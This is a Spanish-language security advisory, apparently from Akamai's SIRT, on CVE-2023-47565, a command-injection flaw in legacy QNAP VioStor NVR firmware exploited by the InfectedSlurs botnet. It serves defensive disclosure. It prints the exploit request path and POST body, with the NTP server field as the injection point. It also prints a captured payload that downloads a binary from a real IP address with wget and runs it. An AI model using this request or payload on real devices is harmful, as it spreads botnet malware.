¿Necesita Cloud Computing? Empiece ahora

Vulnerabilidad explotada de forma activa en QNAP VioStor NVR: corregida, parches disponibles

Akamai Wave Blue

escrito por

Chad Seaman y Larry Cashdollar

December 14, 2023

Chad Seaman headshot

escrito por

Chad Seaman

Chad Seaman es investigador principal de seguridad y jefe del equipo de respuesta a incidentes e inteligencia en seguridad de Akamai. Se refiere orgullosamente a sí mismo como "detector de basura en Internet" y disfruta revisando los desechos que allí encuentra. Chad comenzó su carrera como programador y, después de estar expuesto a la seguridad, la explotación y los análisis forenses a través de investigaciones de filtración, la seguridad se convirtió rápidamente en su trabajo preferido. Ahora se dedica a investigaciones de malware, ingeniería inversa, investigación de vulnerabilidades, DDoS e investigaciones de ciberdelincuencia. Le gusta volar aviones, hacer agujeros en el papel a distancia y pasar tiempo en la naturaleza, preferiblemente sobre una moto de cross por una pista en el bosque.

Larry Cashdollar

escrito por

Larry Cashdollar

Larry W. Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Los sistemas heredados son un terreno fértil para detectar y explotar nuevas vulnerabilidades con el fin de propagar el malware.

Resumen ejecutivo

Lo que necesita saber

Como parte de la investigación sobre InfectedSlurs, el equipo SIRT detectó una vulnerabilidad en los dispositivos de grabación de vídeo en red (NVR) que se están explotando en el mundo real. El dispositivo NVR es una solución de vigilancia de red de alto rendimiento para la supervisión basada en red de cámaras IP, grabación de vídeo, reproducción y acceso remoto a datos. A esta vulnerabilidad se le ha dado el ID CVE-2023-47565 de CVE con una puntuación de CVSS v3 de 8,0.

Esta vulnerabilidad permite que un atacante autenticado consiga inyectar comandos del sistema operativo con una carga útil que se entrega a través de una solicitud POST a la interfaz de gestión. En su configuración actual, utiliza las credenciales predeterminadas del dispositivo en las cargas útiles capturadas.

Están afectadas las siguientes versiones del firmware QNAP VioStor NVR:

  • VioStor NVR: Versiones 5.0.0 y anteriores (la 5.0.0 se publicó el 21 de junio de 2014)

QNAP considera suspendida la asistencia técnica para estos dispositivos; sin embargo, el proveedor recomienda actualizar el firmware de VioStor de los dispositivos existentes a la última versión disponible. Este problema se había corregido anteriormente con la aplicación, de un parche, aunque nunca se informó/divulgó públicamente. Además, los usuarios deben cambiar las contraseñas predeterminadas en sus dispositivos.

Por último, US-CERT ha emitido un aviso.

Explotación observada

Al principio, cuando revisamos las cargas útiles de explotación durante la campaña de InfectedSlurs, solo informamos de dos vulnerabilidades de día cero, ya que el equipo no pudo vincular con seguridad la explotación observada con un dispositivo o fabricante concretos. Esto dificultaba la confirmación de la clasificación de día cero de la explotación.

Tras un examen más profundo de varios aspectos de la explotación y la carga útil, el equipo SIRT consideró que el objetivo eran los dispositivos QNAP VioStor NVR. Estos dispositivos se ajustaban al perfil de objetivo de la campaña y se suministraban con credenciales predeterminadas débiles (se encuentran en sus manuales y se observan en la explotación). Al igual que con los dos primeros días cero, los dispositivos infectados podrían facilitar las vulnerabilidades de inyección de comandos del sistema operativo en la configuración de NTP de los dispositivos afectados del Internet de las cosas (IoT) y NVR.

Después de transmitirle estas teorías, US-CERT se coordinó con SIRT de Akamai y QNAP para revisar las pruebas y ayudar a confirmar las teorías del equipo SIRT. En última instancia, QNAP confirmó que las cargas útiles se dirigían a sus dispositivos VioStor, que ya se han retirado y no reciben asistencia técnica , pero solo atacaban a versiones anteriores (5.0.0 o anteriores) de su firmware previamente publicado.

La vulnerabilidad se explota realizando un POST a la ruta /cgi-bin/server/server.cgi . La ejecución remota de código (RCE) existe donde se especifica el argumento de SPECIFIC_SERVER (Figura 1).

  URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=

PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]

Fig. 1: Intento de explotación de la RCE mediante la inyección de comandos

En la Figura 2 se muestra un ejemplo de carga útil de infección capturada.

  wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86

Fig. 2: Carga útil de RCE capturada

Las prácticas básicas de seguridad son importantes

Lo básico importa. Estas observaciones subrayan una vez más la importancia de las prácticas recomendadas de seguridad básicas, como cambiar las contraseñas predeterminadas en los dispositivos durante la configuración inicial. También destacan la importancia de implementar protocolos de seguridad proactivos a largo plazo aún más estrictos, como garantizar una actualización uniforme de los sistemas como protección frente a posibles ataques y, ocasionalmente, comprobar los sistemas/dispositivos, especialmente si se observa en ellos un comportamiento extraño.

Conclusión

Una vez más, nuestra implementación personalizada de la red como cebo ha proporcionado información valiosa sobre los ciberataques, revelando vulnerabilidades que antes eran desconocidas. La presencia de credenciales predeterminadas y sistemas en red obsoletos y sin asistencia técnica ha demostrado ser una vía para las infecciones de botnets. Los sistemas heredados son un terreno fértil para detectar y explotar nuevas vulnerabilidades con el fin de propagar el malware.

Este hallazgo pone de relieve la importancia crítica de mejorar la concienciación y la formación sobre las prácticas recomendadas para el IoT, destacando los riesgos asociados para el consumidor medio. La necesidad de concienciación se extiende más allá de los consumidores y se aplica también a los fabricantes de estos dispositivos. Unos ciclos de soporte de software más largos y la seguridad durante la configuración, como pueden ser los cambios obligatorios de contraseña, son fundamentales para mantener la seguridad del sistema.

No se lo pierda

El grupo de inteligencia sobre seguridad de Akamai seguirá supervisando amenazas como estas e informando sobre ellas para concienciar a nuestros clientes y a la comunidad de seguridad en general. Para obtener más información, síganos en X, antes conocido como Twitter, para estar al día de lo que descubrimos.

El equipo SIRT de Akamai desea agradecer a CISA, US-CERT y QNAP su asistencia en nuestras comunicaciones, coordinación, identificación, corrección y esfuerzos de divulgación.



Akamai Wave Blue

escrito por

Chad Seaman y Larry Cashdollar

December 14, 2023

Chad Seaman headshot

escrito por

Chad Seaman

Chad Seaman es investigador principal de seguridad y jefe del equipo de respuesta a incidentes e inteligencia en seguridad de Akamai. Se refiere orgullosamente a sí mismo como "detector de basura en Internet" y disfruta revisando los desechos que allí encuentra. Chad comenzó su carrera como programador y, después de estar expuesto a la seguridad, la explotación y los análisis forenses a través de investigaciones de filtración, la seguridad se convirtió rápidamente en su trabajo preferido. Ahora se dedica a investigaciones de malware, ingeniería inversa, investigación de vulnerabilidades, DDoS e investigaciones de ciberdelincuencia. Le gusta volar aviones, hacer agujeros en el papel a distancia y pasar tiempo en la naturaleza, preferiblemente sobre una moto de cross por una pista en el bosque.

Larry Cashdollar

escrito por

Larry Cashdollar

Larry W. Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.